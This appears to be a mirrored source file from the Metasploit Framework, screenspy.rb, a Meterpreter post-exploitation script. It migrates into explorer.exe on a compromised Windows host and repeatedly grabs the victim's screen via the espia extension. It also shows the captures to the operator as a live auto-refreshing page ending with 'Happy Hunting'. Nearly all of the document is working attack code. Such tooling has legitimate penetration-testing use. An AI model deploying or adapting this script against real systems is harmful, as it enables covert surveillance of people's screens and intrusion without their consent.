CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/scripts/meterpreter/screenspy.rb
Views: 1904
1
##

2
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.

3
# If you'd like to improve this script, please try to port it as a post

4
# module instead. Thank you.

5
##

6


7


8


9
# Author:Roni Bachar (@roni_bachar) [email protected]

10
#

11
# This script will open an interactive view of remote hosts

12
# You will need firefox installed on your machine

13


14


15
require 'fileutils'

16


17
opts = Rex::Parser::Arguments.new(

18
  "-h" => [ false, "Help menu." ],

19
  "-d" => [ true, "The Delay in seconds between each screenshot." ],

20
  "-t" => [ true, "The time to run in sec." ],

21
  "-s" => [ true, "The local system linux/windows" ]

22
)

23


24
freq = 3

25
count = 10

26
file = "screenshot.jpeg"

27
meter_type = client.platform

28
localsys = "linux"

29


30
opts.parse(args) { |opt, idx, val|

31
  case opt

32
  when '-d'

33
    freq = val.to_i

34
  when '-t'

35
    count = val.to_i

36
  when '-s'

37
    localsys = val.to_s

38


39
  when "-h"

40
    print_line

41
    print_line "Screenspy v1.0"

42
    print_line "--------------"

43
    print_line

44
    print_line

45
    print_line "Usage: bgrun screenspy -t 20 -d 1 => will take interactive Screenshot every sec for 20 sec long."

46
    print_line "Usage: bgrun screenspy -t 60 -d 5 => will take interactive Screenshot every 5 sec for 1 min long."

47
    print_line "Usage: bgrun screenspy -s windows -d 1 -t 60 => will take interactive Screenshot every 1 sec for 1 min long, windows local mode."

48
    print_line

49
    print_line "Author:Roni Bachar (@roni_bachar) [email protected]"

50
    print_line(opts.usage)

51
    raise Rex::Script::Completed

52
  end

53
}

54


55
# Wrong Meterpreter Version Message Function

56
#-------------------------------------------------------------------------------

57
def wrong_meter_version(meter = meter_type)

58
  print_error("#{meter} version of Meterpreter is not supported with this Script!")

59
  raise Rex::Script::Completed

60
end

61


62
# Check for Version of Meterpreter

63
wrong_meter_version(meter_type) if meter_type != 'windows'

64
session = client

65


66


67


68
host,port = session.session_host, session.session_port

69


70
print_status("New session on #{host}:#{port}...")

71


72
logs = ::File.join(Msf::Config.install_root, 'logs', 'screenshot', host)

73


74
outfile = ::File.join(Msf::Config.log_directory,file)

75


76
::FileUtils.mkdir_p(logs)

77


78


79
begin

80
  process2mig = "explorer.exe"

81


82
  # Actual migration

83
  mypid = session.sys.process.getpid

84
  session.sys.process.get_processes().each do |x|

85
    if (process2mig.index(x['name'].downcase) and x['pid'] != mypid)

86
      print_status("#{process2mig} Process found, migrating into #{x['pid']}")

87
      session.core.migrate(x['pid'].to_i)

88
      print_status("Migration Successful!!")

89
    end

90
  end

91
rescue

92
  print_status("Failed to migrate process!")

93
  #next

94
end

95


96


97
begin

98
  session.core.use("espia")

99


100


101
  begin

102


103
    data="<title>#{host}</title><img src='file:///#{Msf::Config.install_root}/logs/screenshot/#{host}/screenshot.jpeg' width='500' height='500'><meta http-equiv='refresh' content='1'>"

104
    path1 = File.join(logs,"video.html")

105
    File.open(path1, 'w') do |f2|

106
      f2.puts(data)

107
    end

108


109


110
    if (localsys == "windows")

111


112
      print_status("Running in local mode => windows")

113
      print_status("Opening Interactive view...")

114
      localcmd="start firefox -width 530 -height 660 \"file:///#{Msf::Config.install_root}/logs/screenshot/#{host}/video.html\""

115
    else

116
      print_status("Running in local mode => Linux")

117
      print_status("Opening Interactive view...")

118
      localcmd="bash firefox -width 530 -height 660 \"file:///#{Msf::Config.install_root}/logs/screenshot/#{host}/video.html\""

119
    end

120


121
    system (localcmd)

122
    (1..count).each do |i|

123
      sleep(freq) if(i != 1)

124
      path = File.join(logs,"screenshot.jpeg")

125
      data = session.espia.espia_image_get_dev_screen

126


127
      if(data)

128
        ::File.open(path, 'wb') do |fd|

129
          fd.write(data)

130
          fd.close()

131
        end

132
      end

133
    end

134


135
  rescue ::Exception => e

136
    print_status("Interactive Screenshot Failed: #{e.class} #{e} #{e.backtrace}")

137
  end

138


139
  print_status("The interactive Session ended...")

140
  data = <<-EOS

141
<title>#{host} - Interactive Session ended</title>

142
<img src='file:///#{Msf::Config.install_root}/logs/screenshot/#{host}/screenshot.jpeg' width='500' height='500'>

143
<script>alert('Interactive Session ended - Happy Hunting')</script>

144
EOS

145
  File.open(path1, 'w') do |f2|

146
    f2.puts(data)

147
  end

148


149
rescue ::Exception => e

150
  print_status("Exception: #{e.class} #{e} #{e.backtrace}")

151
end

152


153


154


155


156


157


158


159


160